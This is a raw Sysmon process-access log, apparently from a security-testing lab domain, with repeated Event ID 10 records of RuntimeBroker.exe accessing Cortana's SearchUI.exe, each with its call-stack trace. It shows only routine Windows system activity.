12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 